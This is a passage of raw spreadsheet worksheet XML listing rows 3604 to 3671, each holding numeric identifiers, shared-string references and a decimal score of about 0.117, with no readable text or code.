      <c r="C3604" s="2" t="s">
        <v>3405</v>
      </c>
      <c r="D3604" s="2">
        <v>1.0</v>
      </c>
      <c r="E3604" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3604" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="3605" ht="15.75" customHeight="1">
      <c r="A3605" s="1">
        <v>3073.0</v>
      </c>
      <c r="B3605" s="2">
        <v>3.6530169E7</v>
      </c>
      <c r="C3605" s="2" t="s">
        <v>3406</v>
      </c>
      <c r="D3605" s="2">
        <v>1.0</v>
      </c>
      <c r="E3605" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3605" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="3606" ht="15.75" customHeight="1">
      <c r="A3606" s="1">
        <v>10032.0</v>
      </c>
      <c r="B3606" s="2">
        <v>5.7055232E7</v>
      </c>
      <c r="C3606" s="2" t="s">
        <v>3407</v>
      </c>
      <c r="D3606" s="2">
        <v>1.0</v>
      </c>
      <c r="E3606" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3606" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="3607" ht="15.75" customHeight="1">
      <c r="A3607" s="1">
        <v>17390.0</v>
      </c>
      <c r="B3607" s="2">
        <v>4.9608902E7</v>
      </c>
      <c r="C3607" s="2" t="s">
        <v>3408</v>
      </c>
      <c r="D3607" s="2">
        <v>1.0</v>
      </c>
      <c r="E3607" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3607" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="3608" ht="15.75" customHeight="1">
      <c r="A3608" s="1">
        <v>1735.0</v>
      </c>
      <c r="B3608" s="2">
        <v>2.8769711E7</v>
      </c>
      <c r="C3608" s="2" t="s">
        <v>3409</v>
      </c>
      <c r="D3608" s="2">
        <v>1.0</v>
      </c>
      <c r="E3608" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3608" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="3609" ht="15.75" customHeight="1">
      <c r="A3609" s="1">
        <v>10122.0</v>
      </c>
      <c r="B3609" s="2">
        <v>5.7278171E7</v>
      </c>
      <c r="C3609" s="2" t="s">
        <v>3410</v>
      </c>
      <c r="D3609" s="2">
        <v>1.0</v>
      </c>
      <c r="E3609" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3609" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="3610" ht="15.75" customHeight="1">
      <c r="A3610" s="1">
        <v>19641.0</v>
      </c>
      <c r="B3610" s="2">
        <v>5.6286373E7</v>
      </c>
      <c r="C3610" s="2" t="s">
        <v>3411</v>
      </c>
      <c r="D3610" s="2">
        <v>1.0</v>
      </c>
      <c r="E3610" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3610" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="3611" ht="15.75" customHeight="1">
      <c r="A3611" s="1">
        <v>4267.0</v>
      </c>
      <c r="B3611" s="2">
        <v>4.1861432E7</v>
      </c>
      <c r="C3611" s="2" t="s">
        <v>3412</v>
      </c>
      <c r="D3611" s="2">
        <v>1.0</v>
      </c>
      <c r="E3611" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3611" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="3612" ht="15.75" customHeight="1">
      <c r="A3612" s="1">
        <v>4625.0</v>
      </c>
      <c r="B3612" s="2">
        <v>4.297643E7</v>
      </c>
      <c r="C3612" s="2" t="s">
        <v>3413</v>
      </c>
      <c r="D3612" s="2">
        <v>1.0</v>
      </c>
      <c r="E3612" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3612" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="3613" ht="15.75" customHeight="1">
      <c r="A3613" s="1">
        <v>14392.0</v>
      </c>
      <c r="B3613" s="2">
        <v>3.9086537E7</v>
      </c>
      <c r="C3613" s="2" t="s">
        <v>3414</v>
      </c>
      <c r="D3613" s="2">
        <v>1.0</v>
      </c>
      <c r="E3613" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3613" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="3614" ht="15.75" customHeight="1">
      <c r="A3614" s="1">
        <v>17331.0</v>
      </c>
      <c r="B3614" s="2">
        <v>4.9374032E7</v>
      </c>
      <c r="C3614" s="2" t="s">
        <v>3415</v>
      </c>
      <c r="D3614" s="2">
        <v>1.0</v>
      </c>
      <c r="E3614" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3614" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="3615" ht="15.75" customHeight="1">
      <c r="A3615" s="1">
        <v>19310.0</v>
      </c>
      <c r="B3615" s="2">
        <v>5.5285853E7</v>
      </c>
      <c r="C3615" s="2" t="s">
        <v>3416</v>
      </c>
      <c r="D3615" s="2">
        <v>1.0</v>
      </c>
      <c r="E3615" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3615" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="3616" ht="15.75" customHeight="1">
      <c r="A3616" s="1">
        <v>19896.0</v>
      </c>
      <c r="B3616" s="2">
        <v>5.7298265E7</v>
      </c>
      <c r="C3616" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="D3616" s="2">
        <v>1.0</v>
      </c>
      <c r="E3616" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3616" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="3617" ht="15.75" customHeight="1">
      <c r="A3617" s="1">
        <v>17988.0</v>
      </c>
      <c r="B3617" s="2">
        <v>5.1392529E7</v>
      </c>
      <c r="C3617" s="2" t="s">
        <v>3418</v>
      </c>
      <c r="D3617" s="2">
        <v>1.0</v>
      </c>
      <c r="E3617" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3617" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="3618" ht="15.75" customHeight="1">
      <c r="A3618" s="1">
        <v>280.0</v>
      </c>
      <c r="B3618" s="2">
        <v>1.532854E7</v>
      </c>
      <c r="C3618" s="2" t="s">
        <v>3419</v>
      </c>
      <c r="D3618" s="2">
        <v>1.0</v>
      </c>
      <c r="E3618" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3618" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3619" ht="15.75" customHeight="1">
      <c r="A3619" s="1">
        <v>1138.0</v>
      </c>
      <c r="B3619" s="2">
        <v>2.422631E7</v>
      </c>
      <c r="C3619" s="2" t="s">
        <v>3420</v>
      </c>
      <c r="D3619" s="2">
        <v>1.0</v>
      </c>
      <c r="E3619" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3619" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3620" ht="15.75" customHeight="1">
      <c r="A3620" s="1">
        <v>4348.0</v>
      </c>
      <c r="B3620" s="2">
        <v>4.2085604E7</v>
      </c>
      <c r="C3620" s="2" t="s">
        <v>3173</v>
      </c>
      <c r="D3620" s="2">
        <v>1.0</v>
      </c>
      <c r="E3620" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3620" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3621" ht="15.75" customHeight="1">
      <c r="A3621" s="1">
        <v>4465.0</v>
      </c>
      <c r="B3621" s="2">
        <v>4.2462632E7</v>
      </c>
      <c r="C3621" s="2" t="s">
        <v>3421</v>
      </c>
      <c r="D3621" s="2">
        <v>1.0</v>
      </c>
      <c r="E3621" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3621" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3622" ht="15.75" customHeight="1">
      <c r="A3622" s="1">
        <v>5698.0</v>
      </c>
      <c r="B3622" s="2">
        <v>4.6503643E7</v>
      </c>
      <c r="C3622" s="2" t="s">
        <v>3422</v>
      </c>
      <c r="D3622" s="2">
        <v>1.0</v>
      </c>
      <c r="E3622" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3622" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3623" ht="15.75" customHeight="1">
      <c r="A3623" s="1">
        <v>6294.0</v>
      </c>
      <c r="B3623" s="2">
        <v>4.8211548E7</v>
      </c>
      <c r="C3623" s="2" t="s">
        <v>3423</v>
      </c>
      <c r="D3623" s="2">
        <v>1.0</v>
      </c>
      <c r="E3623" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3623" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3624" ht="15.75" customHeight="1">
      <c r="A3624" s="1">
        <v>7554.0</v>
      </c>
      <c r="B3624" s="2">
        <v>5.1531696E7</v>
      </c>
      <c r="C3624" s="2" t="s">
        <v>3424</v>
      </c>
      <c r="D3624" s="2">
        <v>1.0</v>
      </c>
      <c r="E3624" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3624" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3625" ht="15.75" customHeight="1">
      <c r="A3625" s="1">
        <v>7614.0</v>
      </c>
      <c r="B3625" s="2">
        <v>5.170005E7</v>
      </c>
      <c r="C3625" s="2" t="s">
        <v>3425</v>
      </c>
      <c r="D3625" s="2">
        <v>1.0</v>
      </c>
      <c r="E3625" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3625" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3626" ht="15.75" customHeight="1">
      <c r="A3626" s="1">
        <v>9035.0</v>
      </c>
      <c r="B3626" s="2">
        <v>5.5046885E7</v>
      </c>
      <c r="C3626" s="2" t="s">
        <v>3426</v>
      </c>
      <c r="D3626" s="2">
        <v>1.0</v>
      </c>
      <c r="E3626" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3626" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3627" ht="15.75" customHeight="1">
      <c r="A3627" s="1">
        <v>10230.0</v>
      </c>
      <c r="B3627" s="2">
        <v>5.7482674E7</v>
      </c>
      <c r="C3627" s="2" t="s">
        <v>3427</v>
      </c>
      <c r="D3627" s="2">
        <v>1.0</v>
      </c>
      <c r="E3627" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3627" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3628" ht="15.75" customHeight="1">
      <c r="A3628" s="1">
        <v>19298.0</v>
      </c>
      <c r="B3628" s="2">
        <v>5.5204075E7</v>
      </c>
      <c r="C3628" s="2" t="s">
        <v>3428</v>
      </c>
      <c r="D3628" s="2">
        <v>1.0</v>
      </c>
      <c r="E3628" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3628" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="3629" ht="15.75" customHeight="1">
      <c r="A3629" s="1">
        <v>6677.0</v>
      </c>
      <c r="B3629" s="2">
        <v>4.9166399E7</v>
      </c>
      <c r="C3629" s="2" t="s">
        <v>3429</v>
      </c>
      <c r="D3629" s="2">
        <v>1.0</v>
      </c>
      <c r="E3629" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3629" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="3630" ht="15.75" customHeight="1">
      <c r="A3630" s="1">
        <v>10278.0</v>
      </c>
      <c r="B3630" s="2">
        <v>5.7624632E7</v>
      </c>
      <c r="C3630" s="2" t="s">
        <v>3430</v>
      </c>
      <c r="D3630" s="2">
        <v>1.0</v>
      </c>
      <c r="E3630" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3630" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="3631" ht="15.75" customHeight="1">
      <c r="A3631" s="1">
        <v>10787.0</v>
      </c>
      <c r="B3631" s="2">
        <v>1.5694666E7</v>
      </c>
      <c r="C3631" s="2" t="s">
        <v>3431</v>
      </c>
      <c r="D3631" s="2">
        <v>1.0</v>
      </c>
      <c r="E3631" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3631" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="3632" ht="15.75" customHeight="1">
      <c r="A3632" s="1">
        <v>12301.0</v>
      </c>
      <c r="B3632" s="2">
        <v>2.8320259E7</v>
      </c>
      <c r="C3632" s="2" t="s">
        <v>3432</v>
      </c>
      <c r="D3632" s="2">
        <v>1.0</v>
      </c>
      <c r="E3632" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3632" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="3633" ht="15.75" customHeight="1">
      <c r="A3633" s="1">
        <v>17623.0</v>
      </c>
      <c r="B3633" s="2">
        <v>5.0377832E7</v>
      </c>
      <c r="C3633" s="2" t="s">
        <v>3433</v>
      </c>
      <c r="D3633" s="2">
        <v>1.0</v>
      </c>
      <c r="E3633" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3633" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="3634" ht="15.75" customHeight="1">
      <c r="A3634" s="1">
        <v>18711.0</v>
      </c>
      <c r="B3634" s="2">
        <v>5.3654082E7</v>
      </c>
      <c r="C3634" s="2" t="s">
        <v>3434</v>
      </c>
      <c r="D3634" s="2">
        <v>1.0</v>
      </c>
      <c r="E3634" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3634" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="3635" ht="15.75" customHeight="1">
      <c r="A3635" s="1">
        <v>7548.0</v>
      </c>
      <c r="B3635" s="2">
        <v>5.1514526E7</v>
      </c>
      <c r="C3635" s="2" t="s">
        <v>3435</v>
      </c>
      <c r="D3635" s="2">
        <v>1.0</v>
      </c>
      <c r="E3635" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3635" s="2">
        <v>0.1178160919540229</v>
      </c>
    </row>
    <row r="3636" ht="15.75" customHeight="1">
      <c r="A3636" s="1">
        <v>2664.0</v>
      </c>
      <c r="B3636" s="2">
        <v>3.4709583E7</v>
      </c>
      <c r="C3636" s="2" t="s">
        <v>3436</v>
      </c>
      <c r="D3636" s="2">
        <v>1.0</v>
      </c>
      <c r="E3636" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3636" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="3637" ht="15.75" customHeight="1">
      <c r="A3637" s="1">
        <v>6224.0</v>
      </c>
      <c r="B3637" s="2">
        <v>4.802478E7</v>
      </c>
      <c r="C3637" s="2" t="s">
        <v>3437</v>
      </c>
      <c r="D3637" s="2">
        <v>1.0</v>
      </c>
      <c r="E3637" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3637" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="3638" ht="15.75" customHeight="1">
      <c r="A3638" s="1">
        <v>14105.0</v>
      </c>
      <c r="B3638" s="2">
        <v>3.7751276E7</v>
      </c>
      <c r="C3638" s="2" t="s">
        <v>3438</v>
      </c>
      <c r="D3638" s="2">
        <v>1.0</v>
      </c>
      <c r="E3638" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3638" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="3639" ht="15.75" customHeight="1">
      <c r="A3639" s="1">
        <v>244.0</v>
      </c>
      <c r="B3639" s="2">
        <v>1.4993061E7</v>
      </c>
      <c r="C3639" s="2" t="s">
        <v>3439</v>
      </c>
      <c r="D3639" s="2">
        <v>1.0</v>
      </c>
      <c r="E3639" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3639" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="3640" ht="15.75" customHeight="1">
      <c r="A3640" s="1">
        <v>7258.0</v>
      </c>
      <c r="B3640" s="2">
        <v>5.0733799E7</v>
      </c>
      <c r="C3640" s="2" t="s">
        <v>3440</v>
      </c>
      <c r="D3640" s="2">
        <v>1.0</v>
      </c>
      <c r="E3640" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3640" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="3641" ht="15.75" customHeight="1">
      <c r="A3641" s="1">
        <v>14944.0</v>
      </c>
      <c r="B3641" s="2">
        <v>4.1263398E7</v>
      </c>
      <c r="C3641" s="2" t="s">
        <v>3441</v>
      </c>
      <c r="D3641" s="2">
        <v>1.0</v>
      </c>
      <c r="E3641" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3641" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="3642" ht="15.75" customHeight="1">
      <c r="A3642" s="1">
        <v>17413.0</v>
      </c>
      <c r="B3642" s="2">
        <v>4.9666906E7</v>
      </c>
      <c r="C3642" s="2" t="s">
        <v>3442</v>
      </c>
      <c r="D3642" s="2">
        <v>1.0</v>
      </c>
      <c r="E3642" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3642" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="3643" ht="15.75" customHeight="1">
      <c r="A3643" s="1">
        <v>1323.0</v>
      </c>
      <c r="B3643" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C3643" s="2" t="s">
        <v>3443</v>
      </c>
      <c r="D3643" s="2">
        <v>1.0</v>
      </c>
      <c r="E3643" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3643" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3644" ht="15.75" customHeight="1">
      <c r="A3644" s="1">
        <v>4746.0</v>
      </c>
      <c r="B3644" s="2">
        <v>4.3373919E7</v>
      </c>
      <c r="C3644" s="2" t="s">
        <v>3444</v>
      </c>
      <c r="D3644" s="2">
        <v>1.0</v>
      </c>
      <c r="E3644" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3644" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3645" ht="15.75" customHeight="1">
      <c r="A3645" s="1">
        <v>5782.0</v>
      </c>
      <c r="B3645" s="2">
        <v>4.6736158E7</v>
      </c>
      <c r="C3645" s="2" t="s">
        <v>3445</v>
      </c>
      <c r="D3645" s="2">
        <v>1.0</v>
      </c>
      <c r="E3645" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3645" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3646" ht="15.75" customHeight="1">
      <c r="A3646" s="1">
        <v>7429.0</v>
      </c>
      <c r="B3646" s="2">
        <v>5.1178602E7</v>
      </c>
      <c r="C3646" s="2" t="s">
        <v>3446</v>
      </c>
      <c r="D3646" s="2">
        <v>1.0</v>
      </c>
      <c r="E3646" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3646" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3647" ht="15.75" customHeight="1">
      <c r="A3647" s="1">
        <v>9740.0</v>
      </c>
      <c r="B3647" s="2">
        <v>5.6460855E7</v>
      </c>
      <c r="C3647" s="2" t="s">
        <v>3447</v>
      </c>
      <c r="D3647" s="2">
        <v>1.0</v>
      </c>
      <c r="E3647" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3647" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3648" ht="15.75" customHeight="1">
      <c r="A3648" s="1">
        <v>16126.0</v>
      </c>
      <c r="B3648" s="2">
        <v>4.5497624E7</v>
      </c>
      <c r="C3648" s="2" t="s">
        <v>3448</v>
      </c>
      <c r="D3648" s="2">
        <v>1.0</v>
      </c>
      <c r="E3648" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3648" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3649" ht="15.75" customHeight="1">
      <c r="A3649" s="1">
        <v>19554.0</v>
      </c>
      <c r="B3649" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C3649" s="2" t="s">
        <v>3449</v>
      </c>
      <c r="D3649" s="2">
        <v>1.0</v>
      </c>
      <c r="E3649" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3649" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3650" ht="15.75" customHeight="1">
      <c r="A3650" s="1">
        <v>20089.0</v>
      </c>
      <c r="B3650" s="2">
        <v>9457467.0</v>
      </c>
      <c r="C3650" s="2" t="s">
        <v>3450</v>
      </c>
      <c r="D3650" s="2">
        <v>1.0</v>
      </c>
      <c r="E3650" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3650" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3651" ht="15.75" customHeight="1">
      <c r="A3651" s="1">
        <v>20186.0</v>
      </c>
      <c r="B3651" s="2">
        <v>1.0503414E7</v>
      </c>
      <c r="C3651" s="2" t="s">
        <v>3451</v>
      </c>
      <c r="D3651" s="2">
        <v>1.0</v>
      </c>
      <c r="E3651" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3651" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="3652" ht="15.75" customHeight="1">
      <c r="A3652" s="1">
        <v>14740.0</v>
      </c>
      <c r="B3652" s="2">
        <v>4.0709482E7</v>
      </c>
      <c r="C3652" s="2" t="s">
        <v>3452</v>
      </c>
      <c r="D3652" s="2">
        <v>1.0</v>
      </c>
      <c r="E3652" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3652" s="2">
        <v>0.1170940170940171</v>
      </c>
    </row>
    <row r="3653" ht="15.75" customHeight="1">
      <c r="A3653" s="1">
        <v>28682.0</v>
      </c>
      <c r="B3653" s="2">
        <v>2.7574067E7</v>
      </c>
      <c r="C3653" s="2" t="s">
        <v>3453</v>
      </c>
      <c r="D3653" s="2">
        <v>1.0</v>
      </c>
      <c r="E3653" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3653" s="2">
        <v>0.1170940170940171</v>
      </c>
    </row>
    <row r="3654" ht="15.75" customHeight="1">
      <c r="A3654" s="1">
        <v>31821.0</v>
      </c>
      <c r="B3654" s="2">
        <v>5253585.0</v>
      </c>
      <c r="C3654" s="2" t="s">
        <v>3454</v>
      </c>
      <c r="D3654" s="2">
        <v>1.0</v>
      </c>
      <c r="E3654" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3654" s="2">
        <v>0.1166666666666667</v>
      </c>
    </row>
    <row r="3655" ht="15.75" customHeight="1">
      <c r="A3655" s="1">
        <v>13849.0</v>
      </c>
      <c r="B3655" s="2">
        <v>3.6899786E7</v>
      </c>
      <c r="C3655" s="2" t="s">
        <v>3455</v>
      </c>
      <c r="D3655" s="2">
        <v>1.0</v>
      </c>
      <c r="E3655" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3655" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="3656" ht="15.75" customHeight="1">
      <c r="A3656" s="1">
        <v>13853.0</v>
      </c>
      <c r="B3656" s="2">
        <v>3.6899786E7</v>
      </c>
      <c r="C3656" s="2" t="s">
        <v>3456</v>
      </c>
      <c r="D3656" s="2">
        <v>1.0</v>
      </c>
      <c r="E3656" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3656" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="3657" ht="15.75" customHeight="1">
      <c r="A3657" s="1">
        <v>15110.0</v>
      </c>
      <c r="B3657" s="2">
        <v>4.1844623E7</v>
      </c>
      <c r="C3657" s="2" t="s">
        <v>3457</v>
      </c>
      <c r="D3657" s="2">
        <v>1.0</v>
      </c>
      <c r="E3657" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3657" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="3658" ht="15.75" customHeight="1">
      <c r="A3658" s="1">
        <v>490.0</v>
      </c>
      <c r="B3658" s="2">
        <v>1.7622028E7</v>
      </c>
      <c r="C3658" s="2" t="s">
        <v>3458</v>
      </c>
      <c r="D3658" s="2">
        <v>1.0</v>
      </c>
      <c r="E3658" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3658" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3659" ht="15.75" customHeight="1">
      <c r="A3659" s="1">
        <v>505.0</v>
      </c>
      <c r="B3659" s="2">
        <v>1.8087636E7</v>
      </c>
      <c r="C3659" s="2" t="s">
        <v>3459</v>
      </c>
      <c r="D3659" s="2">
        <v>1.0</v>
      </c>
      <c r="E3659" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3659" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3660" ht="15.75" customHeight="1">
      <c r="A3660" s="1">
        <v>537.0</v>
      </c>
      <c r="B3660" s="2">
        <v>1.857388E7</v>
      </c>
      <c r="C3660" s="2" t="s">
        <v>3460</v>
      </c>
      <c r="D3660" s="2">
        <v>1.0</v>
      </c>
      <c r="E3660" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3660" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3661" ht="15.75" customHeight="1">
      <c r="A3661" s="1">
        <v>576.0</v>
      </c>
      <c r="B3661" s="2">
        <v>1.9099044E7</v>
      </c>
      <c r="C3661" s="2" t="s">
        <v>3461</v>
      </c>
      <c r="D3661" s="2">
        <v>1.0</v>
      </c>
      <c r="E3661" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3661" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3662" ht="15.75" customHeight="1">
      <c r="A3662" s="1">
        <v>666.0</v>
      </c>
      <c r="B3662" s="2">
        <v>2.0209975E7</v>
      </c>
      <c r="C3662" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="D3662" s="2">
        <v>1.0</v>
      </c>
      <c r="E3662" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3662" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3663" ht="15.75" customHeight="1">
      <c r="A3663" s="1">
        <v>683.0</v>
      </c>
      <c r="B3663" s="2">
        <v>2.030255E7</v>
      </c>
      <c r="C3663" s="2" t="s">
        <v>3463</v>
      </c>
      <c r="D3663" s="2">
        <v>1.0</v>
      </c>
      <c r="E3663" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3663" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3664" ht="15.75" customHeight="1">
      <c r="A3664" s="1">
        <v>688.0</v>
      </c>
      <c r="B3664" s="2">
        <v>2.0336129E7</v>
      </c>
      <c r="C3664" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="D3664" s="2">
        <v>1.0</v>
      </c>
      <c r="E3664" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3664" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3665" ht="15.75" customHeight="1">
      <c r="A3665" s="1">
        <v>786.0</v>
      </c>
      <c r="B3665" s="2">
        <v>2.1206995E7</v>
      </c>
      <c r="C3665" s="2" t="s">
        <v>3465</v>
      </c>
      <c r="D3665" s="2">
        <v>1.0</v>
      </c>
      <c r="E3665" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3665" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3666" ht="15.75" customHeight="1">
      <c r="A3666" s="1">
        <v>798.0</v>
      </c>
      <c r="B3666" s="2">
        <v>2.1229386E7</v>
      </c>
      <c r="C3666" s="2" t="s">
        <v>3466</v>
      </c>
      <c r="D3666" s="2">
        <v>1.0</v>
      </c>
      <c r="E3666" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3666" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3667" ht="15.75" customHeight="1">
      <c r="A3667" s="1">
        <v>881.0</v>
      </c>
      <c r="B3667" s="2">
        <v>2.1952233E7</v>
      </c>
      <c r="C3667" s="2" t="s">
        <v>3467</v>
      </c>
      <c r="D3667" s="2">
        <v>1.0</v>
      </c>
      <c r="E3667" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3667" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3668" ht="15.75" customHeight="1">
      <c r="A3668" s="1">
        <v>936.0</v>
      </c>
      <c r="B3668" s="2">
        <v>2.239598E7</v>
      </c>
      <c r="C3668" s="2" t="s">
        <v>3468</v>
      </c>
      <c r="D3668" s="2">
        <v>1.0</v>
      </c>
      <c r="E3668" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3668" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3669" ht="15.75" customHeight="1">
      <c r="A3669" s="1">
        <v>1335.0</v>
      </c>
      <c r="B3669" s="2">
        <v>2.5851798E7</v>
      </c>
      <c r="C3669" s="2" t="s">
        <v>3469</v>
      </c>
      <c r="D3669" s="2">
        <v>1.0</v>
      </c>
      <c r="E3669" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3669" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3670" ht="15.75" customHeight="1">
      <c r="A3670" s="1">
        <v>1488.0</v>
      </c>
      <c r="B3670" s="2">
        <v>2.7176207E7</v>
      </c>
      <c r="C3670" s="2" t="s">
        <v>3470</v>
      </c>
      <c r="D3670" s="2">
        <v>1.0</v>
      </c>
      <c r="E3670" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3670" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="3671" ht="15.75" customHeight="1">
      <c r="A3671" s="1">
        <v>2189.0</v>
      </c>
      <c r="B3671" s="2">
        <v>3.1903897E7</v>
      </c>
      <c r="C3671" s="2" t="s">
